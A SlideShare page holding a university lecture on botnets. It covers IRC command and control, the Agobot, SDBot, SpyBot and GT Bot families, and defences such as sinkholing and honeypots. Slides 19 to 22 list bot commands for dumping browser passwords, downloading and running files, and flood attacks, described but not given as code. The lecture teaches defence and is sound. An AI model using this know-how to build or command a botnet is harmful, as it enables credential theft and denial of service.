SlideShare a Scribd company logo

botnet.ppt

Download as PPT, PDF
K
KiranKumar24546

Botnet

Technology
1 of 26
CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012
2 Acknowledgement  This lecture uses some contents from the lecture notes from:  Dr. Dawn Song: CS161: computer security  Richard Wang – SophosLabs: The Development of Botnets  Randy Marchany - VA Tech IT Security Lab: Botnets
3 Botnets  Collection of compromised hosts  Spread like worms and viruses  Once installed, respond to remote commands  A network of ‘bots’  robot : an automatic machine that can be programmed to perform specific tasks.  Also known as ‘zombies’
4  Platform for many attacks  Spam forwarding (70% of all spam?)  Click fraud  Keystroke logging  Distributed denial of service attacks  Serious problem  Top concern of banks, online merchants  Vint Cerf: ¼ of hosts connected to Internet
5 What are botnets used for?
6 IRC (Internet Relay Chat) based Control
7 IRC (Internet Relay Chat) based Control
8 Why IRC?  IRC servers are:  freely available  easy to manage  easy to subvert  Attackers have experience with IRC  IRC bots usually have a way to remotely upgrade victims with new payloads to stay ahead of security efforts
9 How bad is the problem?  Symantec identified a 400K node botnet  Netadmin in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections.  Phatbot harvests MyDoom and Bagel infected machines.  Researchers in Gtech monitored thousands of botnets
10 Spreading Problem  Spreading mechanism is a leading cause of background noise  Port 445, 135, 139, 137 accounted for 80% of traffic captured by German Honeynet Project  Other ports  2745 – bagle backdoor  3127 – MyDoom backdoor  3410 – Optix trojan backdoor  5000 – upnp vulnerability
Most commonly used Bot families  Agobot  SDBot  SpyBot  GT Bot
Agobot  Most sophisticated  20,000 lines C/C++ code  IRC based command/control  Large collection of target exploits  Capable of many DoS attack types  Shell encoding/polymorphic obfuscation  Traffic sniffers/key logging  Defend/fortify compromised system  Ability to frustrate dissassembly
SDBot  Simpler than Agobot, 2,000 lines C code  Non-malicious at base  Utilize IRC-based command/control  Easily extended for malicious purposes  Scanning  DoS Attacks  Sniffers  Information harvesting  Encryption
SpyBot  <3,000 lines C code  Possibly evolved from SDBot  Similar command/control engine  No attempts to hide malicious purposes
GT Bot  Functions based on mIRC scripting capabilities  HideWindow program hides bot on local system  Basic rootkit function  Port scanning, DoS attacks, exploits for RPC and NetBIOS
 Variance in codebase size, structure, complexity, implementation  Convergence in set of functions  Possibility for defense systems effective across bot families  Bot families extensible  Agobot likely to become dominant
 All of the above use IRC for command/control  Disrupt IRC, disable bots  Sniff IRC traffic for commands  Shutdown channels used for Botnets  IRC operators play central role in stopping botnet traffic  But a botnet could use its own IRC server  Automated traffic identification required  Future botnets may move away from IRC  Move to P2P communication  Traffic fingerprinting still useful for identification Control
Host control  Fortify system against other malicious attacks  Disable anti-virus software  Harvest sensitive information  PayPal, software keys, etc.  Economic incentives for botnets  Stresses need to patch/protect systems prior to attack  Stronger protection boundaries required across applications in OSes
19 Example Botnet Commands  Connection  CLIENT: PASS <password>  HOST : (if error, disconnect)  CLIENT: NICK <nick>  HOST : NICKERROR | CONNECTED  Pass hierarchy info  BOTINFO <nick> <connected_to> <priority>  BOTQUIT <nick>
20 Example Botnet Commands  IRC Commands  CHANJOIN <tag> <channel>  CHANPART <tag> <channel>  CHANOP <tag> <channel>  CHANKICK <tag> <channel>  CHANBANNED <tag> <channel>  CHANPRIORITY <ircnet> <channel> <LOW/NORMAL/HIGH>
21 Example Botnet Commands  pstore  Display all usernames/passwords stored in browsers of infected systems  bot.execute  Run executable on remote system  bot.open  Reads file on remote computer  bot.command  Runs command with system()
22 Example Botnet Commands  http.execute  Download and execute file through http  ftp.execute  ddos.udpflood  ddos.synflod  ddos.phaticmp  redirect.http  redirect.socks
23 Current Botnet Control Architecture bot bot C&C botmaster bot C&C •More than one C&C server •Spread all around the world
24 Botnet Monitor: Gatech KarstNet  A lot bots use Dyn- DNS name to find C&C bot bot C&C attacker C&C KarstNet sinkhole cc1.com  KarstNet informs DNS provider of cc1.com  Detect cc1.com by its abnormal DNS queries  DNS provider maps cc1.com to Gatech sinkhole (DNS hijack) bot  All/most bots attempt to connect the sinkhole
Botnet Monitor: Honeypot Spy  Security researchers set up honeypots  Honeypots: deliberately set up vulnerable machines  When compromised, put close monitoring of malware’s behaviors  Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing%29  When compromised honeypot joins a botnet  Passive monitoring: log all network traffic  Active monitoring: actively contact other bots to obtain more information (neighborhood list, additional c&c, etc.)  Representative research paper:  A multifaceted approach to understanding the botnet phenomenon, Abu Rajab, Moheeb and Zarfoss, Jay and Monrose, Fabian and Terzis, Andreas, 6th ACM SIGCOMM conference on Internet measurement (IMC), 2006. 25
26 The Future Generation of Botnets  Peer-to-Peer C&C  Polymorphism  Anti-honeypot  Rootkit techniques

Recommended

098
098098
098Arun Mishra
 
Ce hv6 module 63 botnets
Ce hv6 module 63 botnetsCe hv6 module 63 botnets
Ce hv6 module 63 botnetsVi Tính Hoàng Nam
 
Botnets
BotnetsBotnets
BotnetsVishwadeep Badgujar
 
Botnet
BotnetBotnet
Botnetprisonbreak4950
 
Botnets
BotnetsBotnets
BotnetsKavisha Miyan
 
introduction to Botnet
introduction to Botnetintroduction to Botnet
introduction to Botnetyogendra singh chahar
 
Defending Against Botnets
Defending Against BotnetsDefending Against Botnets
Defending Against BotnetsJim Lippard
 
All you know about Botnet
All you know about BotnetAll you know about Botnet
All you know about BotnetNaveen Titare
 

Recommended

098
098098
098Arun Mishra
 
Ce hv6 module 63 botnets
Ce hv6 module 63 botnetsCe hv6 module 63 botnets
Ce hv6 module 63 botnetsVi Tính Hoàng Nam
 
Botnets
BotnetsBotnets
BotnetsVishwadeep Badgujar
 
Botnet
BotnetBotnet
Botnetprisonbreak4950
 
Botnets
BotnetsBotnets
BotnetsKavisha Miyan
 
introduction to Botnet
introduction to Botnetintroduction to Botnet
introduction to Botnetyogendra singh chahar
 
Defending Against Botnets
Defending Against BotnetsDefending Against Botnets
Defending Against BotnetsJim Lippard
 
All you know about Botnet
All you know about BotnetAll you know about Botnet
All you know about BotnetNaveen Titare
 
about botnets
about botnetsabout botnets
about botnetsAlain Bindele
 
Cisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsCisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsManuel Santander
 
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Julia Yu-Chin Cheng
 
Inside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing FirewallInside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing Firewallamiable_indian
 
Botnet
Botnet Botnet
Botnet PriyanKa Harjai
 
New Botnets Trends and Threats (BH Europe 2007)
New Botnets Trends and Threats (BH Europe 2007)New Botnets Trends and Threats (BH Europe 2007)
New Botnets Trends and Threats (BH Europe 2007)André Fucs de Miranda
 
Brst – Border Router Security Tool
Brst – Border Router Security ToolBrst – Border Router Security Tool
Brst – Border Router Security Tooltleroy0928
 
Hack the hack
Hack the hackHack the hack
Hack the hackShakti Ranjan
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Lightweight C&C based botnet detection using Aho-Corasick NFA
Lightweight C&C based botnet detection using Aho-Corasick NFALightweight C&C based botnet detection using Aho-Corasick NFA
Lightweight C&C based botnet detection using Aho-Corasick NFAIJNSA Journal
 
Internet security
Internet securityInternet security
Internet securitygOhElprashanT
 
Internet security
Internet securityInternet security
Internet securitygohel
 
Module 9 Dos
Module 9 DosModule 9 Dos
Module 9 Dosleminhvuong
 
[2010 CodeEngn Conference 04] Max - Fighting against Botnet
[2010 CodeEngn Conference 04] Max - Fighting against Botnet[2010 CodeEngn Conference 04] Max - Fighting against Botnet
[2010 CodeEngn Conference 04] Max - Fighting against BotnetGangSeok Lee
 
Botnet Architecture
Botnet ArchitectureBotnet Architecture
Botnet ArchitectureBhagath Singh Jayaprakasam
 
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...OWASP Delhi
 
Botnets
BotnetsBotnets
Botnetsrichashri3
 
A short visit to the bot zoo
A short visit to the bot zooA short visit to the bot zoo
A short visit to the bot zooUltraUploader
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxnull - The Open Security Community
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 

More Related Content

Similar to botnet.ppt

Cisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsCisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsManuel Santander
 
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Julia Yu-Chin Cheng
 
Inside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing FirewallInside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing Firewallamiable_indian
 
New Botnets Trends and Threats (BH Europe 2007)
New Botnets Trends and Threats (BH Europe 2007)New Botnets Trends and Threats (BH Europe 2007)
New Botnets Trends and Threats (BH Europe 2007)André Fucs de Miranda
 
Brst – Border Router Security Tool
Brst – Border Router Security ToolBrst – Border Router Security Tool
Brst – Border Router Security Tooltleroy0928
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Lightweight C&C based botnet detection using Aho-Corasick NFA
Lightweight C&C based botnet detection using Aho-Corasick NFALightweight C&C based botnet detection using Aho-Corasick NFA
Lightweight C&C based botnet detection using Aho-Corasick NFAIJNSA Journal
 
Internet security
Internet securityInternet security
Internet securitygohel
 
[2010 CodeEngn Conference 04] Max - Fighting against Botnet
[2010 CodeEngn Conference 04] Max - Fighting against Botnet[2010 CodeEngn Conference 04] Max - Fighting against Botnet
[2010 CodeEngn Conference 04] Max - Fighting against BotnetGangSeok Lee
 
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...OWASP Delhi
 
A short visit to the bot zoo
A short visit to the bot zooA short visit to the bot zoo
A short visit to the bot zooUltraUploader
 

Similar to botnet.ppt (20)

about botnets
about botnetsabout botnets
about botnets
 
Cisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsCisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designs
 
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
 
Inside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing FirewallInside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing Firewall
 
Botnet
Botnet Botnet
Botnet
 
New Botnets Trends and Threats (BH Europe 2007)
New Botnets Trends and Threats (BH Europe 2007)New Botnets Trends and Threats (BH Europe 2007)
New Botnets Trends and Threats (BH Europe 2007)
 
Brst – Border Router Security Tool
Brst – Border Router Security ToolBrst – Border Router Security Tool
Brst – Border Router Security Tool
 
Hack the hack
Hack the hackHack the hack
Hack the hack
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Lightweight C&C based botnet detection using Aho-Corasick NFA
Lightweight C&C based botnet detection using Aho-Corasick NFALightweight C&C based botnet detection using Aho-Corasick NFA
Lightweight C&C based botnet detection using Aho-Corasick NFA
 
Internet security
Internet securityInternet security
Internet security
 
Internet security
Internet securityInternet security
Internet security
 
Module 9 Dos
Module 9 DosModule 9 Dos
Module 9 Dos
 
[2010 CodeEngn Conference 04] Max - Fighting against Botnet
[2010 CodeEngn Conference 04] Max - Fighting against Botnet[2010 CodeEngn Conference 04] Max - Fighting against Botnet
[2010 CodeEngn Conference 04] Max - Fighting against Botnet
 
Botnet Architecture
Botnet ArchitectureBotnet Architecture
Botnet Architecture
 
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
 
Botnets
BotnetsBotnets
Botnets
 
A short visit to the bot zoo
A short visit to the bot zooA short visit to the bot zoo
A short visit to the bot zoo
 

Recently uploaded

SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 

Recently uploaded (20)

E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 

botnet.ppt

  • 1. CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012
  • 2. 2 Acknowledgement  This lecture uses some contents from the lecture notes from:  Dr. Dawn Song: CS161: computer security  Richard Wang – SophosLabs: The Development of Botnets  Randy Marchany - VA Tech IT Security Lab: Botnets
  • 3. 3 Botnets  Collection of compromised hosts  Spread like worms and viruses  Once installed, respond to remote commands  A network of ‘bots’  robot : an automatic machine that can be programmed to perform specific tasks.  Also known as ‘zombies’
  • 4. 4  Platform for many attacks  Spam forwarding (70% of all spam?)  Click fraud  Keystroke logging  Distributed denial of service attacks  Serious problem  Top concern of banks, online merchants  Vint Cerf: ¼ of hosts connected to Internet
  • 5. 5 What are botnets used for?
  • 6. 6 IRC (Internet Relay Chat) based Control
  • 7. 7 IRC (Internet Relay Chat) based Control
  • 8. 8 Why IRC?  IRC servers are:  freely available  easy to manage  easy to subvert  Attackers have experience with IRC  IRC bots usually have a way to remotely upgrade victims with new payloads to stay ahead of security efforts
  • 9. 9 How bad is the problem?  Symantec identified a 400K node botnet  Netadmin in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections.  Phatbot harvests MyDoom and Bagel infected machines.  Researchers in Gtech monitored thousands of botnets
  • 10. 10 Spreading Problem  Spreading mechanism is a leading cause of background noise  Port 445, 135, 139, 137 accounted for 80% of traffic captured by German Honeynet Project  Other ports  2745 – bagle backdoor  3127 – MyDoom backdoor  3410 – Optix trojan backdoor  5000 – upnp vulnerability
  • 11. Most commonly used Bot families  Agobot  SDBot  SpyBot  GT Bot
  • 12. Agobot  Most sophisticated  20,000 lines C/C++ code  IRC based command/control  Large collection of target exploits  Capable of many DoS attack types  Shell encoding/polymorphic obfuscation  Traffic sniffers/key logging  Defend/fortify compromised system  Ability to frustrate dissassembly
  • 13. SDBot  Simpler than Agobot, 2,000 lines C code  Non-malicious at base  Utilize IRC-based command/control  Easily extended for malicious purposes  Scanning  DoS Attacks  Sniffers  Information harvesting  Encryption
  • 14. SpyBot  <3,000 lines C code  Possibly evolved from SDBot  Similar command/control engine  No attempts to hide malicious purposes
  • 15. GT Bot  Functions based on mIRC scripting capabilities  HideWindow program hides bot on local system  Basic rootkit function  Port scanning, DoS attacks, exploits for RPC and NetBIOS
  • 16.  Variance in codebase size, structure, complexity, implementation  Convergence in set of functions  Possibility for defense systems effective across bot families  Bot families extensible  Agobot likely to become dominant
  • 17.  All of the above use IRC for command/control  Disrupt IRC, disable bots  Sniff IRC traffic for commands  Shutdown channels used for Botnets  IRC operators play central role in stopping botnet traffic  But a botnet could use its own IRC server  Automated traffic identification required  Future botnets may move away from IRC  Move to P2P communication  Traffic fingerprinting still useful for identification Control
  • 18. Host control  Fortify system against other malicious attacks  Disable anti-virus software  Harvest sensitive information  PayPal, software keys, etc.  Economic incentives for botnets  Stresses need to patch/protect systems prior to attack  Stronger protection boundaries required across applications in OSes
  • 19. 19 Example Botnet Commands  Connection  CLIENT: PASS <password>  HOST : (if error, disconnect)  CLIENT: NICK <nick>  HOST : NICKERROR | CONNECTED  Pass hierarchy info  BOTINFO <nick> <connected_to> <priority>  BOTQUIT <nick>
  • 20. 20 Example Botnet Commands  IRC Commands  CHANJOIN <tag> <channel>  CHANPART <tag> <channel>  CHANOP <tag> <channel>  CHANKICK <tag> <channel>  CHANBANNED <tag> <channel>  CHANPRIORITY <ircnet> <channel> <LOW/NORMAL/HIGH>
  • 21. 21 Example Botnet Commands  pstore  Display all usernames/passwords stored in browsers of infected systems  bot.execute  Run executable on remote system  bot.open  Reads file on remote computer  bot.command  Runs command with system()
  • 22. 22 Example Botnet Commands  http.execute  Download and execute file through http  ftp.execute  ddos.udpflood  ddos.synflod  ddos.phaticmp  redirect.http  redirect.socks
  • 23. 23 Current Botnet Control Architecture bot bot C&C botmaster bot C&C •More than one C&C server •Spread all around the world
  • 24. 24 Botnet Monitor: Gatech KarstNet  A lot bots use Dyn- DNS name to find C&C bot bot C&C attacker C&C KarstNet sinkhole cc1.com  KarstNet informs DNS provider of cc1.com  Detect cc1.com by its abnormal DNS queries  DNS provider maps cc1.com to Gatech sinkhole (DNS hijack) bot  All/most bots attempt to connect the sinkhole
  • 25. Botnet Monitor: Honeypot Spy  Security researchers set up honeypots  Honeypots: deliberately set up vulnerable machines  When compromised, put close monitoring of malware’s behaviors  Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing%29  When compromised honeypot joins a botnet  Passive monitoring: log all network traffic  Active monitoring: actively contact other bots to obtain more information (neighborhood list, additional c&c, etc.)  Representative research paper:  A multifaceted approach to understanding the botnet phenomenon, Abu Rajab, Moheeb and Zarfoss, Jay and Monrose, Fabian and Terzis, Andreas, 6th ACM SIGCOMM conference on Internet measurement (IMC), 2006. 25
  • 26. 26 The Future Generation of Botnets  Peer-to-Peer C&C  Polymorphism  Anti-honeypot  Rootkit techniques